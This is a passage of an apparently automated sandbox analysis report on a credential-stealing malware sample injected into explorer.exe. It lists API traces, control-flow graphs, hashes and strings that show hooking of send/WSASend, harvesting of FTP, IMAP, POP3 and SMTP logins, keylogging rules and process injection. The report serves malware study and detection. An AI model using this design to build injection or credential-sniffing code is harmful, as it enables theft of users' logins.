                                                                                                                              APIs
                                                                                                                                • Part of subcall function 034A2861: GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
                                                                                                                                • Part of subcall function 034A2861: RtlAllocateHeap.NTDLL(00000000), ref: 034A286B
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,034A109E,?,034A1010), ref: 034A134A
                                                                                                                              • GetCurrentProcessId.KERNEL32(00000003,?,034A109E,?,034A1010), ref: 034A135B
                                                                                                                              • wsprintfA.USER32 ref: 034A1372
                                                                                                                                • Part of subcall function 034A263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 034A265A
                                                                                                                                • Part of subcall function 034A263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 034A2672
                                                                                                                                • Part of subcall function 034A263E: lstrlen.KERNEL32(?,00000000), ref: 034A267A
                                                                                                                                • Part of subcall function 034A263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 034A2685
                                                                                                                                • Part of subcall function 034A263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 034A269F
                                                                                                                                • Part of subcall function 034A263E: wsprintfA.USER32 ref: 034A26B6
                                                                                                                                • Part of subcall function 034A263E: CryptDestroyHash.ADVAPI32(?), ref: 034A26CF
                                                                                                                                • Part of subcall function 034A263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 034A26D9
                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 034A1389
                                                                                                                              • GetLastError.KERNEL32 ref: 034A138F
                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 034A13A1
                                                                                                                                • Part of subcall function 034A24D5: GetCurrentProcessId.KERNEL32 ref: 034A24E7
                                                                                                                                • Part of subcall function 034A24D5: GetCurrentThreadId.KERNEL32 ref: 034A24EF
                                                                                                                                • Part of subcall function 034A24D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 034A24FF
                                                                                                                                • Part of subcall function 034A24D5: Thread32First.KERNEL32(00000000,0000001C), ref: 034A250D
                                                                                                                                • Part of subcall function 034A24D5: CloseHandle.KERNEL32(00000000), ref: 034A2566
                                                                                                                              • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 034A13B8
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 034A13BF
                                                                                                                              • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 034A13E4
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 034A13EB
                                                                                                                                • Part of subcall function 034A1DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 034A1E1D
                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 034A141D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                              • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                              • API String ID: 706757162-1430290102
                                                                                                                              • Opcode ID: 882a04ac5a3e68f29e40d2f7f67f9cf6fa0808b50768b1d01336b0677d40d13e
                                                                                                                              • Instruction ID: b3e42d608187135af638fbb8cf4990537641085099ca1d8640e954e2d8151ba2
                                                                                                                              • Opcode Fuzzy Hash: 882a04ac5a3e68f29e40d2f7f67f9cf6fa0808b50768b1d01336b0677d40d13e
                                                                                                                              • Instruction Fuzzy Hash: 5631F639304F14BFDB00FFAEDC09B9E3E95AF64A01F14441AF506AE385DBB584019798

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 235 34a1647-34a165a 236 34a1748-34a174f 235->236 237 34a1660-34a1662 235->237 237->236 238 34a1668-34a166b 237->238 238->236 239 34a1671-34a167d lstrlen 238->239 240 34a1683-34a168a lstrlen 239->240 241 34a1747 239->241 240->241 242 34a1690-34a16a8 getpeername 240->242 241->236 242->241 243 34a16ae-34a16ca inet_ntoa htons 242->243 243->241 244 34a16cc-34a16d4 243->244 245 34a1708 244->245 246 34a16d6-34a16d9 244->246 249 34a170d-34a173c call 34a2861 wsprintfA call 34a24ae 245->249 247 34a16db-34a16de 246->247 248 34a16f3-34a16f8 246->248 250 34a16e0-34a16e3 247->250 251 34a1701-34a1706 247->251 248->249 249->241 259 34a173e-34a1745 call 34a2843 249->259 253 34a16fa-34a16ff 250->253 254 34a16e5-34a16ea 250->254 251->249 253->249 254->248 256 34a16ec-34a16f1 254->256 256->241 256->248 259->241
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                              • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                              • API String ID: 3379139566-1703351401
                                                                                                                              • Opcode ID: 170eb8f635945fac7cc31a7e42e764c62ea29bdcdf8af1151415f0af693f767c
                                                                                                                              • Instruction ID: 4f3867f692fcead8502ea8722c3aefddc753b34ed15395883dfab958e7fc5463
                                                                                                                              • Opcode Fuzzy Hash: 170eb8f635945fac7cc31a7e42e764c62ea29bdcdf8af1151415f0af693f767c
                                                                                                                              • Instruction Fuzzy Hash: 8021A63EA00A096BDB10DEAD8C845BFBAAD9B65202F0C417BE954EF315DB34C9019A58

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 267 34a1752-34a1774 GetModuleHandleA GetProcAddress 268 34a17c1-34a17c6 267->268 269 34a1776-34a17c0 RtlZeroMemory * 4 267->269 269->268
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,034A1539,?,?,?,034A144B,?), ref: 034A1763
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 034A176A
                                                                                                                              • RtlZeroMemory.NTDLL(034A4228,00000104), ref: 034A1788
                                                                                                                              • RtlZeroMemory.NTDLL(034A4118,00000104), ref: 034A1790
                                                                                                                              • RtlZeroMemory.NTDLL(034A4330,00000104), ref: 034A1798
                                                                                                                              • RtlZeroMemory.NTDLL(034A4000,00000104), ref: 034A17A1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                              • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                              • API String ID: 1490332519-278825019
                                                                                                                              • Opcode ID: dc48d9b8aad01cc963ceb15cc759135fcb4be79d34df1d32527bb5964a59033d
                                                                                                                              • Instruction ID: 7b97888f2dfa03518ec3255470ca9a9fa3a4702e0216002167803569f1388bfd
                                                                                                                              • Opcode Fuzzy Hash: dc48d9b8aad01cc963ceb15cc759135fcb4be79d34df1d32527bb5964a59033d
                                                                                                                              • Instruction Fuzzy Hash: D1F05437781F283BC110A6AF6C0AC4FBD5CC5B1DE63620157B5246F307A9D5680056AD

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 034A24E7
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 034A24EF
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 034A24FF
                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 034A250D
                                                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 034A252C
                                                                                                                              • SuspendThread.KERNEL32(00000000), ref: 034A253C
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 034A254B
                                                                                                                              • Thread32Next.KERNEL32(00000000,0000001C), ref: 034A255B
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 034A2566
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1467098526-0
                                                                                                                              • Opcode ID: c220f1425761c7fb938475e75c32a0d900da8ca03c20b7e0883adeb507ee53d6
                                                                                                                              • Instruction ID: e1d2554f80520385405c60c04e91c45d05a973f54fd4ebb4ad401143445ca6aa
                                                                                                                              • Opcode Fuzzy Hash: c220f1425761c7fb938475e75c32a0d900da8ca03c20b7e0883adeb507ee53d6
                                                                                                                              • Instruction Fuzzy Hash: 581182B5408A01EFD700EF64A80DB6FFFE8FF49701F04091AF681AA148E7708505ABA6

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 281 34a1f4a-34a1fa5 call 34a22b8 call 34a2861 call 34a27e2 call 34a2374 290 34a1fc0-34a1fcc 281->290 291 34a1fa7-34a1fbe 281->291 294 34a1fd0-34a1fd2 290->294 291->294 295 34a1fd8-34a200f RtlZeroMemory 294->295 296 34a22a6-34a22b5 call 34a2843 294->296 300 34a229e-34a22a5 295->300 301 34a2015-34a2030 295->301 300->296 302 34a2062-34a2074 301->302 303 34a2032-34a2043 call 34a22e5 301->303 310 34a2078-34a207a 302->310 308 34a2056 303->308 309 34a2045-34a2054 303->309 311 34a2058-34a2060 308->311 309->311 312 34a228b-34a2291 310->312 313 34a2080-34a20dc call 34a2731 310->313 311->310 316 34a229a 312->316 317 34a2293-34a2295 call 34a2843 312->317 321 34a20e2-34a20e7 313->321 322 34a2284 313->322 316->300 317->316 323 34a20e9-34a20fa 321->323 324 34a2101-34a212f call 34a2861 wsprintfW 321->324 322->312 323->324 327 34a2148-34a215f 324->327 328 34a2131-34a2133 324->328 333 34a219e-34a21b8 327->333 334 34a2161-34a2197 call 34a2861 wsprintfW 327->334 329 34a2134-34a2137 328->329 331 34a2139-34a213e 329->331 332 34a2142-34a2144 329->332 331->329 335 34a2140 331->335 332->327 339 34a21be-34a21d1 333->339 340 34a2261-34a2277 call 34a2843 333->340 334->333 335->327 339->340 344 34a21d7-34a21ed call 34a2861 339->344 347 34a2279-34a227b call 34a2843 340->347 348 34a2280 340->348 351 34a21ef-34a21fa 344->351 347->348 348->322 352 34a220e-34a2225 351->352 353 34a21fc-34a2209 call 34a2826 351->353 357 34a2229-34a2236 352->357 358 34a2227 352->358 353->352 357->351 359 34a2238-34a223c 357->359 358->357 360 34a223e 359->360 361 34a2256-34a225d call 34a2843 359->361 362 34a223e call 34a2815 360->362 361->340 364 34a2243-34a2250 RtlMoveMemory 362->364 364->361
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 034A2861: GetProcessHeap.KERNEL32(00000008,0000A000,034A10CC), ref: 034A2864
                                                                                                                                • Part of subcall function 034A2861: RtlAllocateHeap.NTDLL(00000000), ref: 034A286B
                                                                                                                                • Part of subcall function 034A27E2: lstrlen.KERNEL32(034A40DA,?,00000000,00000000,034A1F86,74DE8A60,034A40DA,00000000), ref: 034A27EA
                                                                                                                                • Part of subcall function 034A27E2: MultiByteToWideChar.KERNEL32(00000000,00000000,034A40DA,00000001,00000000,00000000), ref: 034A27FC
                                                                                                                                • Part of subcall function 034A2374: RtlZeroMemory.NTDLL(?,00000018), ref: 034A2386
                                                                                                                              • RtlZeroMemory.NTDLL(?,0000003C), ref: 034A1FE2
                                                                                                                              • wsprintfW.USER32 ref: 034A211B
                                                                                                                              • wsprintfW.USER32 ref: 034A2186
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 034A2250
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                              • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                              • API String ID: 4204651544-1701262698
                                                                                                                              • Opcode ID: 6f51b6e9cd748f5949bca28e5ff38a27ca2dee43bff7bbd6dc6e5602cbabee81
                                                                                                                              • Instruction ID: 6447cc142220379f00ee88051dce7968fa241ef3d9d537f9218d57b5f4ca138a
                                                                                                                              • Opcode Fuzzy Hash: 6f51b6e9cd748f5949bca28e5ff38a27ca2dee43bff7bbd6dc6e5602cbabee81
                                                                                                                              • Instruction Fuzzy Hash: 3DA1A075608B04AFD310DF69C884A2BBBE8FF98340F14492EF985DB350EBB0D9049B56

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 366 34a25ad-34a25c9 OpenProcess 367 34a25cb-34a25da IsWow64Process 366->367 368 34a2600-34a2607 366->368 369 34a25dc-34a25ec IsWow64Process 367->369 370 34a25f7 367->370 371 34a25f9-34a25fa CloseHandle 369->371 372 34a25ee-34a25f5 369->372 370->371 371->368 372->371
                                                                                                                              APIs
                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,034A1287), ref: 034A25BF
                                                                                                                              • IsWow64Process.KERNEL32(000000FF,?), ref: 034A25D1
                                                                                                                              • IsWow64Process.KERNEL32(00000000,?), ref: 034A25E4
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 034A25FA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Offset: 034A1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_16_2_34a1000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                              • String ID: microsoftedgecp.exe
                                                                                                                              • API String ID: 331459951-1475183003
                                                                                                                              • Opcode ID: 4bbed5d979c632a3581d127f441f870195fb4c4ff9ad6a3b019e30319e42dfd1
                                                                                                                              • Instruction ID: 1a83addc241b9f364b06b51c2c2651c00d7f2569fd694a5ca690db872e70ef71
                                                                                                                              • Opcode Fuzzy Hash: 4bbed5d979c632a3581d127f441f870195fb4c4ff9ad6a3b019e30319e42dfd1
                                                                                                                              • Instruction Fuzzy Hash: 21F0B475906A1CFF9B10DF949D888EFBBACFF05251F14426AF901AA284E7714F04F6A4

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:8.8%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:9
                                                                                                                              Total number of Limit Nodes:2
                                                                                                                              execution_graph 765 f69fab 766 f69fd8 765->766 768 f69ff8 765->768 769 f6a048 766->769 773 f6a04d 769->773 770 f6a135 LoadLibraryA 770->773 771 f6a190 VirtualProtect VirtualProtect 772 f6a1e8 771->772 772->772 773->770 773->771 774 f6a185 773->774 774->768

                                                                                                                              Callgraph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              • Opacity -> Relevance
                                                                                                                              • Disassembly available
                                                                                                                              callgraph 0 Function_00F61576 1 Function_00F62BF4 2 Function_00F62774 3 Function_00F61B70 4 Function_00F61E70 5 Function_00F62B70 32 Function_00F61838 5->32 49 Function_00F61A04 5->49 6 Function_00F630F0 12 Function_00F61860 6->12 24 Function_00F61C58 6->24 6->32 56 Function_00F61A88 6->56 58 Function_00F62508 6->58 7 Function_00F625FC 8 Function_00F618F8 9 Function_00F614F9 10 Function_00F62860 10->2 10->3 38 Function_00F62620 10->38 11 Function_00F61560 12->3 13 Function_00F624E0 14 Function_00F6156C 15 Function_00F618E8 16 Function_00F61254 17 Function_00F614D4 18 Function_00F61DD4 18->32 19 Function_00F62054 19->4 19->8 19->12 21 Function_00F618D0 19->21 27 Function_00F61F40 19->27 19->32 33 Function_00F61938 19->33 45 Function_00F62010 19->45 53 Function_00F6188C 19->53 20 Function_00F6B0D5 22 Function_00F61D50 22->32 23 Function_00F6355C 23->3 23->6 23->23 23->32 37 Function_00F63220 23->37 25 Function_00F64059 26 Function_00F625C4 26->7 27->8 27->32 28 Function_00F64A41 29 Function_00F6A048 54 Function_00F6A00A 29->54 30 Function_00F614B2 31 Function_00F61BB0 34 Function_00F62CB8 34->12 34->32 39 Function_00F61D20 34->39 35 Function_00F645A7 36 Function_00F61822 37->3 37->10 37->31 37->32 37->33 43 Function_00F61C28 37->43 57 Function_00F61C08 37->57 40 Function_00F63020 40->3 48 Function_00F62E98 40->48 41 Function_00F641A1 42 Function_00F69FAB 42->29 44 Function_00F6B115 45->49 46 Function_00F6141D 47 Function_00F62418 47->12 47->19 47->32 48->1 48->5 48->18 48->34 48->49 59 Function_00F62E08 48->59 50 Function_00F61405 51 Function_00F61000 52 Function_00F62E80 53->32 55 Function_00F61508 58->13 58->21 58->26 59->12 59->15 59->22 59->47 60 Function_00F63088 60->3 60->48

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 119 f6355c-f6356c call f61b70 122 f63572-f635a5 call f61838 119->122 123 f635fc-f63601 119->123 127 f635a7 call f61838 122->127 128 f635d1-f635f6 NtUnmapViewOfSection 122->128 130 f635ac-f635c5 127->130 132 f63608-f63617 call f63220 128->132 133 f635f8-f635fa 128->133 130->128 139 f63621-f6362a 132->139 140 f63619-f6361c call f6355c 132->140 133->123 135 f63602-f63607 call f630f0 133->135 135->132 140->139
                                                                                                                              APIs
                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 00F635D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F61000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_f61000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: SectionUnmapView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 498011366-0
                                                                                                                              • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                              • Instruction ID: 605a085198037e2ce1e4127eb7ccf0d724207d4a84addab63ff3889230126574
                                                                                                                              • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                              • Instruction Fuzzy Hash: 7D119430A15A095FEB58BBB898AD67937A0FB54311F58012AA81AC76A1DB3D8A40D701

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 f63220-f6325b call f61838 3 f63261-f63273 CreateToolhelp32Snapshot 0->3 4 f63549-f63554 SleepEx 3->4 5 f63279-f6328f Process32First 3->5 4->3 6 f63538-f6353a 5->6 7 f63294-f632ac 6->7 8 f63540-f63543 CloseHandle 6->8 10 f632b2-f632c6 7->10 11 f6348c-f63495 call f61bb0 7->11 8->4 10->11 15 f632cc-f632e0 10->15 16 f6352a-f63532 Process32Next 11->16 17 f6349b-f634a4 call f61c08 11->17 15->11 22 f632e6-f632fa 15->22 16->6 17->16 21 f634aa-f634b1 call f61c28 17->21 21->16 26 f634b3-f634c1 call f61b70 21->26 22->11 27 f63300-f63314 22->27 26->16 31 f634c3-f63525 call f61938 call f62860 call f61938 26->31 27->11 32 f6331a-f6332e 27->32 31->16 32->11 35 f63334-f63348 32->35 35->11 40 f6334e-f63362 35->40 40->11 44 f63368-f6337c 40->44 44->11 46 f63382-f63396 44->46 46->11 48 f6339c-f633b0 46->48 48->11 50 f633b6-f633ca 48->50 50->11 52 f633d0-f633e4 50->52 52->11 54 f633ea-f633fe 52->54 54->11 56 f63404-f63418 54->56 56->11 58 f6341a-f6342e 56->58 58->11 60 f63430-f63444 58->60 60->11 62 f63446-f6345a 60->62 62->11 64 f6345c-f63470 62->64 64->11 66 f63472-f63486 64->66 66->11 66->16
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F61000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_f61000_explorer.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2482764027-0
                                                                                                                              • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                              • Instruction ID: 5d9eeb141caa5740bd632d719419426fa81fee1fd696639cb4cdb378cffdc67b
                                                                                                                              • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                              • Instruction Fuzzy Hash: 098131316186098FE71AEF64EC58BEAB7A1FB51741F44472AA443C71A0EF78DA04DB81

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 68 f6a048-f6a04b 69 f6a055-f6a059 68->69 70 f6a065 69->70 71 f6a05b-f6a063 69->71 72 f6a067 70->72 73 f6a04d-f6a053 70->73 71->70 74 f6a06a-f6a071 72->74 73->69 76 f6a073-f6a07b 74->76 77 f6a07d 74->77 76->77 77->74 78 f6a07f-f6a082 77->78 79 f6a097-f6a0a4 78->79 80 f6a084-f6a092 78->80 90 f6a0a6-f6a0a8 79->90 91 f6a0be-f6a0cc call f6a00a 79->91 81 f6a094-f6a095 80->81 82 f6a0ce-f6a0e9 80->82 81->79 84 f6a11a-f6a11d 82->84 85 f6a122-f6a129 84->85 86 f6a11f-f6a120 84->86 89 f6a12f-f6a133 85->89 88 f6a101-f6a105 86->88 92 f6a107-f6a10a 88->92 93 f6a0eb-f6a0ee 88->93 94 f6a135-f6a14e LoadLibraryA 89->94 95 f6a190-f6a1e4 VirtualProtect * 2 89->95 96 f6a0ab-f6a0b2 90->96 91->69 92->85 97 f6a10c-f6a110 92->97 93->85 101 f6a0f0 93->101 100 f6a14f-f6a156 94->100 98 f6a1e8-f6a1ed 95->98 113 f6a0b4-f6a0ba 96->113 114 f6a0bc 96->114 102 f6a112-f6a119 97->102 103 f6a0f1-f6a0f5 97->103 98->98 104 f6a1ef-f6a1fe 98->104 100->89 106 f6a158 100->106 101->103 102->84 103->88 107 f6a0f7-f6a0f9 103->107 110 f6a164-f6a16c 106->110 111 f6a15a-f6a162 106->111 107->88 112 f6a0fb-f6a0ff 107->112 115 f6a16e-f6a17a 110->115 111->115 112->88 112->92 113->114 114->91 114->96 117 f6a185-f6a18f 115->117 118 f6a17c-f6a183 115->118 118->100
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNELBASE ref: 00F6A147
                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 00F6A1BB
                                                                                                                              • VirtualProtect.KERNELBASE ref: 00F6A1D9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.4175265628.0000000000F67000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F67000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_f67000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 895956442-0
                                                                                                                              • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                              • Instruction ID: b55971858ab42edf6796f99acebc117824dff2dd9884f84e3eab229f973c003a
                                                                                                                              • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                              • Instruction Fuzzy Hash: C851AB3275891D0BCB24AB3C9CC07F5B7C1E756335F18072AC48AD3285E959D886AF83

                                                                                                                              Callgraph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              • Opacity -> Relevance
                                                                                                                              • Disassembly available
                                                                                                                              callgraph 0 Function_005517DC 23 Function_00552A09 0->23 1 Function_0055255C 2 Function_00551ED8 3 Function_0055275A 4 Function_00552841 5 Function_005524CC 6 Function_005526C9 7 Function_005525F1 8 Function_00551E66 32 Function_00551CBF 8->32 9 Function_00559AE0 10 Function_0055276D 11 Function_00552569 12 Function_005529E8 13 Function_005529EB 37 Function_00552724 13->37 14 Function_00551FEA 15 Function_00551016 15->3 15->4 15->6 15->10 15->13 19 Function_0055288D 15->19 21 Function_0055268F 15->21 15->23 31 Function_005518BF 15->31 36 Function_005510A5 15->36 15->37 45 Function_005512AE 15->45 46 Function_005526AE 15->46 47 Function_005513AE 15->47 16 Function_00552799 17 Function_00551581 17->13 17->23 33 Function_0055293E 17->33 34 Function_005516B9 17->34 17->37 18 Function_00551000 18->15 20 Function_0055200D 20->13 20->23 42 Function_005520A1 20->42 22 Function_0055240F 22->4 24 Function_00551E89 24->2 24->14 24->37 25 Function_0055298A 26 Function_00551FB4 41 Function_00551E26 26->41 27 Function_00551533 28 Function_005529BD 29 Function_00551BBD 30 Function_0055243D 30->23 30->25 31->29 31->37 40 Function_00551B26 31->40 33->13 33->23 34->0 34->13 35 Function_00551F3A 35->8 35->14 35->26 35->28 36->3 36->4 36->6 36->10 36->13 36->19 36->21 36->23 36->31 36->37 36->45 36->46 38 Function_005525A4 38->23 39 Function_00553627 41->32 42->5 42->13 42->19 42->22 42->23 42->25 42->28 42->30 43 Function_0055182D 43->13 43->20 43->23 43->38 44 Function_005529AE 43->44 45->1 45->4 45->11 45->13 45->23 45->28 45->44 47->7 47->13 47->16 47->23 47->24 47->35 48 Function_0055162B 48->34

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00552724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,005529F3,-00000001,0055128C), ref: 00552731
                                                                                                                                • Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
                                                                                                                                • Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00551038
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0055106C
                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00551075
                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00551010), ref: 0055107B
                                                                                                                              • wsprintfA.USER32 ref: 005510E7
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00551155
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00551160
                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 0055117F
                                                                                                                              • CharLowerA.USER32(?), ref: 00551199
                                                                                                                              • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 005511B5
                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00551212
                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0055126C
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0055127F
                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 0055129F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                              • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                              • API String ID: 3206029838-2805246637
